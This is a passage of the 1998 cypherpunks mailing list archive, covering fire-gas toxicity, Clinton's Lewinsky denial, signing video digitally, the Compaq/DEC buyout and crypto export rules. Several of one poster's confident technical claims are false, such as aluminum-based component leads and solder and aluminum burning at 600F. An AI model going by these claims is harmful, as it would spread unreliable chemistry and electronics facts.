> oxygen, and thus the reaction is starved of free hydrogen by the time the
> carbon begins to burn.  Various other nitrogen compounds are produced,
> such as NOx, but this is true of all combustion and not limited to plastic.

I have forwarded to the list a single safety standard for plastics and fires.
It *specificaly* mentions HCN, so apparently it not only can happen but does
often enough they want to test for it on a national level. There are many
more out there and as I said before, if you contact your local fire dept.
they can provide you with documentation as well.

> A more likely (and deadly) result, which you did not mention, is sulfur
> dioxide.  Most plastics don't contain sulfur, but rubber products may.

Sulfur dioxide is present and does pose a threat, fortunately it's a rather
short termed threat and treatable. Sulfur dioxide turns into sulphuric acid
in the water of the body. Not to mention it burns up the oxygen in formation.
The biggest threat with the acids that are produced in a fire is to your
possessions. They soak this stuff up and then when the firemen put the fire
out they use water which creates acids. These acids effect the components of
your possessions over an extended time.

> Sulfur dioxide combines with water to produce H2SO3 and H2SO4 (sulfuric
> acid) which is quite toxic if inhaled.

Depends on the molarity. It is nowhere near as toxic as cyanide on a per
part basis.

> Most smoke inhalation deaths result for particles clogging the lungs rather
> than gases.  Cats have a tendency to hide when they feel threatened or
> injured, an instinct which often imperils them in a burning building.

Actualy most smoke inhalation deaths occur because of lack of oxygen and the
elevated temperatures. The actual clogging process would take much longer
than the 2-3 minutes most smoke deaths take to occur.

As to cats hiding, they tend to hind *under* furniture which is actualy the
*safest* place to be, the clearest air is next to the floor. It was also
where my cats were found, in the living room under the couch where the smoke
very clearly never got below about shoulder height - it stains the walls
quite well. The fire didn't even make it into that part of the house, it
stopped in the next room. The fire itself burned for less than 20 minutes
total because the neighbor saw it about 5 minutes after the person who
accidently set it off had left. The fire station was on the next block.
It was very quick. The firemen were very careful to explain to me exactly
why the cats died, gases from the plastics (HCN was specificaly mentioned)
and the temperature of the air (they estimate over 350F). While not enough
to cause spontaneous combustion it is more than enough to cook the lungs.
The air was hot enough that several plastic bags holding wargame materials
within 1 ft of the floor were melted but the paper materials were not even
scorched. This would further indicate that the damage was done by the
temperature of the gas and not direct flame or smoke.

> Also remember that computers have materials in them other than plastic, for
> example lead and other heavy metals.  Batteries and electrolytic capacitors
> are also sources of many toxic materials.

The leads on most components are an aluminum compound (my background is EE)
and they typicaly don't start to burn until well over 800F, aluminum itself
burns at 600. Since typical tip temperatures in soldering (lead eutecticts
only - not indium composites) are in the 600 to 700 it is clear that pure
aluminum would not be desirable. So they mix tin and other compounds with 
it.

As to electrolytics, the liquid plastics that make up the dielectrics are
very toxic and most certainly give off xCN compounds when burned.

Just for the record, Lead (the element) is not generaly used in modern
electronics except in a eutectic solder mix for connections. I have several
computers that were burned in the fire and the majority of the solder on the
pcb's was *not* evaporated. In most cases it wasn't even melted even though
the case was completely gone (2 A1000's that work fine though the cases were
completely destroyed by the temperature of the air, not fire).

> In short, it's not the plastic that's toxic, it's all the other crap (ink,
> dye, glue, solder, batteries, dielectric, etc)

Malarky.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 27 Jan 1998 03:03:24 +0800
To: cypherpunks@cyberpass.net
Subject: Latest Clinton dodge?
Message-ID: <v03007804b0f27e3096cb@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Clinton said this morning:

>>>>
 I want you to listen to me.  I'm
going to say this again.  I did not have sexual relations with that
woman, Miss Lewinsky.  I never told anybody to lie, not a single time
-- never.  These allegations are false.
<<<<

The question then becomes, of course, what does "sexual relations" mean?

Is it oral sex?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 03:48:59 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Video & cryptography... (fwd)
Message-ID: <199801261945.NAA28522@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Adam Shostack <adam@homeport.org>
> Subject: Re: Video & cryptography...
> Date: Mon, 26 Jan 1998 13:56:57 -0500 (EST)

> Schneier, Wagner and Kelsey have done some work on an authenticating
> camera.
> 
> One issue to be concerned with is that what the camera sees is not
> always the truth.  Putting a film set together to film bigfoot is
> easy.  The fact that the film is authenticated as having come from the
> camera doesn't mean a whole lot in some cases.

Doesn't this same sort of issue arise from any other digital signature
process then? There should be nothing fundamentaly different between the
characteristics of a video camera signing a frame than a person signing
email.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 27 Jan 1998 03:13:55 +0800
To: ravage@ssz.com
Subject: Re: Video & cryptography...
In-Reply-To: <199801261728.LAA27585@einstein.ssz.com>
Message-ID: <199801261856.NAA03348@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Schneier, Wagner and Kelsey have done some work on an authenticating
camera.

One issue to be concerned with is that what the camera sees is not
always the truth.  Putting a film set together to film bigfoot is
easy.  The fact that the film is authenticated as having come from the
camera doesn't mean a whole lot in some cases.

Adam


Jim Choate wrote:
| Hi,
| 
| I was in a discussion with several people regarding the rate if improvement
| of current video production equipment and how it would effect the veracity
| of video images of all sorts in future legal cases.
| 
| Is anyone aware of anybody working on a mechanism to digitaly sign video and
| photographs (a cool app of stego I suspect)? This would alleviate a great
| deal of mistrust for security video cams and such. What I had in mind was
| the manufacturer puts a unique key in each machines rom's and when each
| image comes in a signature of the image and the key is stored in the
| interframe retraces that are normaly not shown (ala videotext). I asked a
| couple of people in the biz that I know and it seemed a new concept to them.
| 
| Just a thought...
| 
| 
|     ____________________________________________________________________
|    |                                                                    |
|    |       The most powerful passion in life is not love or hate,       |
|    |       but the desire to edit somebody elses words.                 |
|    |                                                                    |
|    |                                  Sign in Ed Barsis' office         |
|    |                                                                    | 
|    |            _____                             The Armadillo Group   |
|    |         ,::////;::-.                           Austin, Tx. USA     |
|    |        /:'///// ``::>/|/                     http://www.ssz.com/   |
|    |      .',  ||||    `/( e\                                           |
|    |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
|    |                                                 ravage@ssz.com     |
|    |                                                  512-451-7087      |
|    |____________________________________________________________________|
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 27 Jan 1998 06:18:48 +0800
To: David Miller <dm0@avana.net>
Subject: Re: Compaq / DEC buyout
In-Reply-To: <199801261956.NAA28599@einstein.ssz.com>
Message-ID: <v03102800b0f2b9cbc3ef@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:46 PM -0800 1/26/98, David Miller wrote:
>Jim, I'm forwarding this to the list:
>
>Jim Choate wrote:

>I think so.  Tim had mentioned that last he heard the Intel/DEC deal was dead.
>Perhaps this is what he was talking about.  The thing is, how much about the

This grossly distorts what I have said. I don't have time to sift through
my posts on Intel and DEC, but I can't believe I said anything so
simplistic as "the Intel/DEC deal is dead." (Or even "was dead," if we want
to get into Clintonesque semantics.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Roger J Jones" <cyber@ibpinc.com>
Date: Tue, 27 Jan 1998 04:41:40 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: Latest Clinton dodge?
In-Reply-To: <v03007804b0f27e3096cb@[168.161.105.216]>
Message-ID: <199801262032.OAA05982@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: text/plain



Did not Clinton say publicly that he did not consider oral sex "sexual
relations" in some statement recently?

[mailto:owner-cypherpunks@cyberpass.net]On Behalf Of Declan McCullagh
Clinton said this morning:

>>>>
 I want you to listen to me.  I'm
going to say this again.  I did not have sexual relations with that
woman, Miss Lewinsky.  I never told anybody to lie, not a single time
-- never.  These allegations are false.
<<<<

>>>>The question then becomes, of course, what does "sexual relations" mean?

Is it oral sex?

-Declan

<<<<<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 27 Jan 1998 07:04:44 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Compaq / DEC buyout (fwd)
Message-ID: <v03102802b0f2c357021d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:44 PM -0800 1/26/98, BMM wrote:
>The "Screamer 533" is currently shipping with a 533MHz Alpha.  It is
>reviewed in this month's "Linux Journal".
>
>
>On Mon, 26 Jan 1998, Jim Choate wrote:
>
>> Unless my info is seriously off DEC is already shipping 500MHz Alpha's and
>> has 1GHz chips in test. DEC historicaly has been way ahead of Intel (say a

This is simply untrue, that DEC historically has been way ahead of Intel.
The Alpha is a different type of chip. Anyone who has analyzed the past few
years, the past decade, and the past couple of decades would have a hard
time making the case that DEC has been ahead of Intel in the overall
combination of design and manufacturing.

As you should know, Intel will be making the Alpha chip, as its
manufacturing capabilities are _overall_ in advance of DEC's. (Beware of
comparing R&D or prototype fab capabilities with high volume fab
capabilities...Intel has its own R&D fabs, currently developing 0.13 micron
capabilities...DEC will not be participating in this move to sub-0.20
micron areas.)

Many things go into the "who's ahead" calculation, besides just clock
speed. Had that been the only significant issue, some of the aerospace
companies with their VHSIC chips in the early 80s would have won. Or the
Silicon on Sapphire (SOS) and GaAs processor chips...very fast, but very
low-yielding.

I've written a couple of long posts on this, and won't here.

Of course, if I am wrong, and Intel is behind the other chip or computer
companies in this overall ability, there are some mightly good investment
opportunities, either in selling Intel short or in buying the stock of AMD,
Compaq, Sun, etc.

We can each put our money where our mouth is. So far, I've done awfully
well holding the Intel stock I acquired in the 1970s. "The past is no
guarantee of future behavior," as the disclaimor goes, but I have seen no
reason to sell the bulk of my holdings.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 27 Jan 1998 07:36:21 +0800
To: cypherpunks@cyberpass.net
Subject: "Privacy on the Line"
Message-ID: <199801262255.OAA08550@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm about half way through Diffie and Landau's new book, 

    Privacy on the Line: The Politics of Wiretapping and Encryption

and have found it quite interesting and entertaining.

	Contents

	1. Introduction
	2. Cryptography
	3. Cryptography and Public Policy
	4. National Security
	5. Law Enforcement
	6. Privacy: Protections and Threats
	7. Wiretapping
	8. Communications: The Current Scene
	9: Cryptography: The Current Scene
       10: Conclusion

It's 342 pages including a great section of notes.

Computer Literacy has it for $22.50.  ISBN 0-262-04167-7
mail order: 408-435-0744

ObWoMD: "8. (p. 82) Distinguishing nuclear explosions from other
events, such as large lightning bolts or explosions of meteors in the
atmosphere, is not easy.  The satellite reacts less to the total
energy of the blast than to the form of the flash.  Nuclear explosions
have a characteristic two-humped flash caused by gamma ray induced
formation of nitrogen pentoxide (N2O5).  The time between humps is
called the "bhang metre" and is characteristic of the type of weapon."

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 05:11:52 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Compaq / DEC buyout (fwd)
Message-ID: <199801262104.PAA28864@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Jan 1998 15:46:58 -0800
> From: David Miller <dm0@avana.net>
> Subject: Compaq / DEC buyout

> Oh, shit.  Well, it seems as though Compaq has been pulling away from Intel
> lately (towards AMD), so perhaps this will be a GoodThing(tm), because
> otherwise DEC might turn out to be like Apple, except to die a much, much
> slower death.

Had DEC not been bought this is exactly (IMO) what would have happened.

> I'm afraid that Intel may know enough now to make a 1GHz pentium, which would
> probably a ModeratelyBadThing(tm).  I'd much prefer DEC to save mankind and
> lead them into the next millenium.

Unless my info is seriously off DEC is already shipping 500MHz Alpha's and
has 1GHz chips in test. DEC historicaly has been way ahead of Intel (say a
year or so which in this business is a lot) and I don't see any reason to
suspect that to stop. A comparison of base technology between Intel and DEC
leads me to believe DEC is ahead a good margin. Intel won because of the
price (DEC has historicaly been very expensive) and support of MS and IBM.
(remember, nobody ever lost their job for buying IBM)

> Yep, but for how much longer?  Some elephants never die, and right now it
> looks like Intel can once again save MicroSoft's OS by hardware (ironically
> via DEC).  NT bloats as the hardware gets faster.

The only question I have is whether MS will continue to produce a HAL for
WinNT 5.0 or whatever they call it. That could put a serious crimp in
Compaq/DEC and would most definitely spawn a new round of lawsuites.

Had you realized that when we break the 1GHz barrier it won't be safe to
operate these machines without the cover on them? It'd be like breaking the
inter-lock on your microwave.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 05:27:24 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: HCN & Plastics
Message-ID: <199801262114.PAA28935@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Per [1],

"There are many  compounds in which carbon is bonded to Nitrogen. Hydrogen
Cyanide, HCN, is commercialy prepared by the ... The compound is highly
poisonous, low boiling liquid (boiling point, 26.5C) an dis used in the
manufacture of plastics."


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|


[1] Chemistry, 6ed.
    Mortimer
    ISBN 0-534-05670-9
    pp. 670





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Roger J Jones" <cyber@ibpinc.com>
Date: Tue, 27 Jan 1998 05:52:49 +0800
To: "'Declan McCullagh'" <declan@pathfinder.com>
Subject: RE: Latest Clinton dodge?
In-Reply-To: <v03007809b0f2af59255b@[168.161.105.216]>
Message-ID: <199801262142.PAA09728@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks for the info - while I am at it - has anyone ever disclosed the
"distinguishing characteristic" that Paula Jones claims will prove its Bubba
Bill?

-----Original Message-----
From: Declan McCullagh [mailto:declan@pathfinder.com]
Sent: Monday, January 26, 1998 3:26 PM
To: Roger J Jones
Cc: cypherpunks@cyberpass.net
Subject: RE: Latest Clinton dodge?


Not as far as I'm aware. Tho Gennifer Flowers said years ago that Clinton
distinguishes between the two.

You may be thinking of his "there is no sexual relationship" quip last Wed,
which was duly dissected and analyzed; journalists remembered his artful
dodge on the pot-smoking affair.

I think we note in our (rather extensive) cover package in this week's
magazine that Sen.Hatch and Speaker Gingrich also make this kind of
distinction, at least according to women who claim they're in a position to
know.

Interestingly, they're going to be the fellows sitting in judgment if this
goes to impeachment and trial...

-Declan



At 14:35 -0600 1/26/98, Roger J Jones wrote:
>Did not Clinton say publicly that he did not consider oral sex "sexual
>relations" in some statement recently?
>
>[mailto:owner-cypherpunks@cyberpass.net]On Behalf Of Declan McCullagh
>Clinton said this morning:
>
>>>>>
> I want you to listen to me.  I'm
>going to say this again.  I did not have sexual relations with that
>woman, Miss Lewinsky.  I never told anybody to lie, not a single time
>-- never.  These allegations are false.
><<<<
>
>>>>>The question then becomes, of course, what does "sexual relations"
mean?
>
>Is it oral sex?
>
>-Declan
>
><<<<<







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Tue, 27 Jan 1998 04:50:47 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Compaq / DEC buyout
In-Reply-To: <199801261956.NAA28599@einstein.ssz.com>
Message-ID: <34CD2072.17C2@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim, I'm forwarding this to the list:

Jim Choate wrote:
> >From the news on CNN it's a done deal. DEC share holders are supposed to get
> like $30/share and some sort of transfer of stocks...

Oh, shit.  Well, it seems as though Compaq has been pulling away from Intel
lately (towards AMD), so perhaps this will be a GoodThing(tm), because
otherwise DEC might turn out to be like Apple, except to die a much, much
slower death.

> Wonder if this means that Compaq will go head to head with MS/Intel now?

I think so.  Tim had mentioned that last he heard the Intel/DEC deal was dead.
Perhaps this is what he was talking about.  The thing is, how much about the
Alpha does Intel know, and does this mean yet another round of lawsuits?
I'm afraid that Intel may know enough now to make a 1GHz pentium, which would
probably a ModeratelyBadThing(tm).  I'd much prefer DEC to save mankind and
lead them into the next millenium.

> They will certainly have the experience and the market name to attempt it.
> Last time I checked the Alpha was still a good deal faster than the Pentium.

Yep, but for how much longer?  Some elephants never die, and right now it
looks like Intel can once again save MicroSoft's OS by hardware (ironically
via DEC).  NT bloats as the hardware gets faster.

> Now since Compaq can use vertical marketing in regards to Alpha chips they
> should be able to produce much more competitive machines price wise than DEC
> was able to do.
> 
> I have a fond place for DEC, a PDP/8e was the first machine I ever actualy
> got to put my hands on. I miss the front panel switches sometimes (not often
> though)...

I'll aways have a fondness in my heart for installing RSTS from a TU-10
tapedrive and having to wait almost an hour for it to fall off the spindle
before having to start all over...

--David Miller

middle  rival
devil rim lad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 27 Jan 1998 07:19:40 +0800
To: cypherpunks@toad.com
Subject: Re: Latest Clinton dodge?
In-Reply-To: <v03007804b0f27e3096cb@[168.161.105.216]>
Message-ID: <4ymXJe1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh <declan@well.com> writes:

> 
> Clinton said this morning:
> 
> >>>>
>  I want you to listen to me.  I'm
> going to say this again.  I did not have sexual relations with that
> woman, Miss Lewinsky.  I never told anybody to lie, not a single time
> -- never.  These allegations are false.
> <<<<
> 
> The question then becomes, of course, what does "sexual relations" mean?
> 
> Is it oral sex?
> 
> -Declan
> 
> 

I fail to see any crypto-relevance in this question, but Mr. Clinton
has made it perfectly clear that he doesn't consider getting a blow
job to be sexual relations.

As for his telling anybody to lie, hmm... we have his deposition where he
admitted having sex with Gennifer Flowers (sp?), and we have a taped
phone call where he asked her to deny it.

Clinton has as much credibility as Semeer Parekh, Sandy Sandfart, and
the rest of the C2Net gang. (Gotta say something cryptorelevant :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 06:16:18 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Video & cryptography... (fwd)
Message-ID: <199801262210.QAA29306@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Adam Shostack <adam@homeport.org>
> Subject: Re: Video & cryptography... (fwd)
> Date: Mon, 26 Jan 1998 17:02:53 -0500 (EST)

> | Doesn't this same sort of issue arise from any other digital signature
> | process then? There should be nothing fundamentaly different between the
> | characteristics of a video camera signing a frame than a person signing
> | email.
> 
> 	It arises in a different context; with a signature on paper,
> you're generally indicating that you've read and consented to whats on
> the paper, not that you created it.

Isn't signing the document at least in theory a participatory creative act?
If you don't sign it then it doesn't exist in the same context as if you do.
Otherwise why have the signature? If I use a camera to sign a digital image
am I not stating that I have viewed and consented to the image being a valid
representation of what the lens saw? Seem quite similar to me.

>  The meaning of a camera signing a
> video still is not obvious to me.  Is it intended to be 'this is what
> we saw through the lens?' or 'this is what really happened?'

A mechanism to sign a digital image would provide some base protection
against altering the image surreptitously, just as why you sign (and get a
copy) of other documentary evidence.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@pathfinder.com>
Date: Tue, 27 Jan 1998 05:47:16 +0800
To: "Roger J Jones" <cyber@ibpinc.com>
Subject: RE: Latest Clinton dodge?
In-Reply-To: <v03007804b0f27e3096cb@[168.161.105.216]>
Message-ID: <v03007809b0f2af59255b@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Not as far as I'm aware. Tho Gennifer Flowers said years ago that Clinton
distinguishes between the two.

You may be thinking of his "there is no sexual relationship" quip last Wed,
which was duly dissected and analyzed; journalists remembered his artful
dodge on the pot-smoking affair.

I think we note in our (rather extensive) cover package in this week's
magazine that Sen.Hatch and Speaker Gingrich also make this kind of
distinction, at least according to women who claim they're in a position to
know.

Interestingly, they're going to be the fellows sitting in judgment if this
goes to impeachment and trial...

-Declan



At 14:35 -0600 1/26/98, Roger J Jones wrote:
>Did not Clinton say publicly that he did not consider oral sex "sexual
>relations" in some statement recently?
>
>[mailto:owner-cypherpunks@cyberpass.net]On Behalf Of Declan McCullagh
>Clinton said this morning:
>
>>>>>
> I want you to listen to me.  I'm
>going to say this again.  I did not have sexual relations with that
>woman, Miss Lewinsky.  I never told anybody to lie, not a single time
>-- never.  These allegations are false.
><<<<
>
>>>>>The question then becomes, of course, what does "sexual relations" mean?
>
>Is it oral sex?
>
>-Declan
>
><<<<<







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@ns.minder.net>
Date: Tue, 27 Jan 1998 05:53:12 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Compaq / DEC buyout (fwd)
In-Reply-To: <199801262104.PAA28864@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.980126164122.17890B-100000@ns.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



The "Screamer 533" is currently shipping with a 533MHz Alpha.  It is
reviewed in this month's "Linux Journal".


On Mon, 26 Jan 1998, Jim Choate wrote:

> Unless my info is seriously off DEC is already shipping 500MHz Alpha's and
> has 1GHz chips in test. DEC historicaly has been way ahead of Intel (say a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Oswald <joswald@rpkusa.com>
Date: Tue, 27 Jan 1998 09:17:06 +0800
To: "'Bill Stewart'" <cypherpunks@cyberpass.net>
Subject: RE: Announcement: RPK InvisiMail released on 12 Jan, 1998
Message-ID: <01BD2A7C.342CBB60@joswald@rpkusa.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill - The technology that we export as part of RPK InvisiMail, is 
world-class strong crypto.  Key size options are 607 bits and 1279.  The 
math behind the system is based on the same as that of D-H.  There is no 
snake oil.  There was no intentional or unintentional attempt to mislead 
any government authority.  We also did not request an export license, 
because there is no need to do so in New Zealand as long as the export is 
by means of the Internet.  Peter G. knows this as well.  The story may be 
different for physical export on disk, disc or tape, although we cannot 
concur with Peter's personal experience.  Our experience is that we get 
pretty good treatment from the NZ authorities.  We also may use a different 
approach.  I have often heard that you can often get a better response when 
using honey than vinegar.  Therein may explain differences in our 
respective experiences.  I have personally met with the Minister of Trade 
for New Zealand.  His views and those of his staff seemed to be acceptable 
to us and have not imposed any undue restrictions of our business or our 
ability to operate.

Jack Oswald
President and CEO
RPK Fast Public Key Encryption
RPK New Zealand Ltd.
4750 Capitola Road
Capitola, CA 95010
joswald@rpkusa.com
www.rpk.co.nz
www.InvisiMail.com
+1 408.479.7874 phone
+1 408.479.1409 fax
+1 800.475.4509 pager


-----Original Message-----
From:	Bill Stewart [SMTP:bill.stewart@pobox.com]
Sent:	Sunday, January 25, 1998 5:44 PM
To:	RPK New Zealand Ltd; cypherpunks@cyberpass.net
Cc:	scataldi@earthlink.net
Subject:	Re: Announcement: RPK InvisiMail released on 12 Jan, 1998

I was amused to receive two mail messages back-to-back,
one from Peter Gutmann talking about New Zealand having one of the
strictest formal export controls in the world, and one from
RPK New Zealand talking about how their encryption product is
not export-controlled because it's from NZ, not the US,
and how their RPK Fast Public Key Encryptonite(tm) Engine
is the strongest crypto in the world.  Either they haven't
bothered asking for export permission, or they asked in such a way
that the export bureaucrats didn't notice it was crypto and
regulated by their crypto export preventers, or their crypto
somehow falls through the cracks, e.g. by using an algorithm with
public keys shorter than 512 bits (works for ECC, not RSA)
and private keys shorter than 40 bits (or 41 on a good day),
or perhaps passes the "snake oil test" for export permission.
I suppose it's possible that the NZ Export Bureaucrats have
lightened up since Peter's last dealings with them,
but it's not likely.

>--------------- The mail, referencing www.invisimail.com
>RPK New Zealand Ltd. in a joint venture with Virtually Online Ltd.
>has released RPK InvisiMail, a standards-based e-mail security
>application for use with Internet mail software (SMTP/POP3).
>The product offers the strongest encryption available anywhere in
>the world.  Since it was built outside the United States,
>it is also available all over the world with strong encryption.
>RPK InvisiMail is also the easiest product of its type
>to setup and use which makes it quite unique.

========= From Peter Gutmann's web page
This policy has resulted in New
Zealand enjoying the dubious distinction of having the strictest export
controls on earth, with everything ranging from crypto hardware down to
software, library books, computer magazines, and journals being restricted
from export.  It's not even possible for a university to publish academic
research without prior permission from a government agency, and the
requirements for obtaining this permission are structured to ensure that 
they
can never be fulfilled.  You can find the information on:

  http://www.cs.auckland.ac.nz/~pgut001/policy/

==============================
				Thanks!
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <rhayden@orion.means.net>
Date: Tue, 27 Jan 1998 07:09:39 +0800
To: BMM <bmm@ns.minder.net>
Subject: Re: Compaq / DEC buyout (fwd)
In-Reply-To: <Pine.LNX.3.96.980126164122.17890B-100000@ns.minder.net>
Message-ID: <Pine.LNX.3.95.980126165852.795A-100000@geek.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 26 Jan 1998, BMM wrote:

> The "Screamer 533" is currently shipping with a 533MHz Alpha.  It is
> reviewed in this month's "Linux Journal".

We have purchased several Alpha based clone computers in the last 4 months
that are all 533MHz machines.  There is also available a 566MHz, a 600MHz,
and an 800MHz, but for our applications the price is prohibitive.

These are clone machines using a DEC Alpha motherboard and CPU.  Very nice
boxes :-)
 
=-=-=-=-=-=
Robert Hayden			rhayden@means.net	       UIN: 3937211
IP Network Administrator	http://rhayden.means.net
MEANS Telcom			(612) 230-4416 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 27 Jan 1998 06:11:07 +0800
To: ravage@ssz.com
Subject: Re: Video & cryptography... (fwd)
In-Reply-To: <199801261945.NAA28522@einstein.ssz.com>
Message-ID: <199801262202.RAA05102@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
| > From: Adam Shostack <adam@homeport.org>
| > Subject: Re: Video & cryptography...
| > Date: Mon, 26 Jan 1998 13:56:57 -0500 (EST)
| 
| > Schneier, Wagner and Kelsey have done some work on an authenticating
| > camera.

Dave points out that this was Schneier, Hall and Kelsey.

